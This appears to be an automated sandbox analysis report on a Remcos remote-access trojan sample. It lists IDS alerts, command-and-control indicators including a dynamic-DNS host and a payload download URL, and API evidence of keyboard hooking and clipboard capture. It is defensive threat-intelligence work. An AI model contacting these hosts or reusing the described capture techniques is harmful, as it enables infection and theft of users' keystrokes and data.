              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50017 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50015 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50022 -> 192.169.69.26:4610
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326
              Source: Malware configuration extractorURLs: hafiznor3374.duckdns.org
              Source: Malware configuration extractorIPs: 127.0.0.1
              Uses dynamic DNS services
              Source: unknownDNS query: name: hafiznor3374.duckdns.org
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4E2F8 InternetCheckConnectionA,0_2_02B4E2F8
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 23.237.50.106:443
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 1010.filemail.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AA4A66 recv,5_2_04AA4A66
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 1010.filemail.com
              Source: global trafficDNS traffic detected: DNS query: 1010.filemail.com
              Source: global trafficDNS traffic detected: DNS query: hafiznor3374.duckdns.org
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: colorcpl.exeString found in binary or memory: http://geoplugin.net/json.gp
              Source: colorcpl.exe, 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0$
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com0
              Source: MeP66xi1AM.exe, 00000000.00000002.2192520767.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1010.filemail.com/Ff
              Source: MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A7D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://1010.filemail.com/api/fi
              Source: MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZP
              Source: MeP66xi1AM.exe, 00000000.00000002.2192520767.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1010.filemail.com:443/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodR
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownHTTPS traffic detected: 23.237.50.106:443 -> 192.168.2.6:49708 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A89340 SetWindowsHookExA 0000000D,04A8932C,000000005_2_04A89340
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8A65A OpenClipboard,GetClipboardData,CloseClipboard,5_2_04A8A65A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A94EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_04A94EC1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8A65A OpenClipboard,GetClipboardData,CloseClipboard,5_2_04A8A65A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A89468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,5_2_04A89468

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE
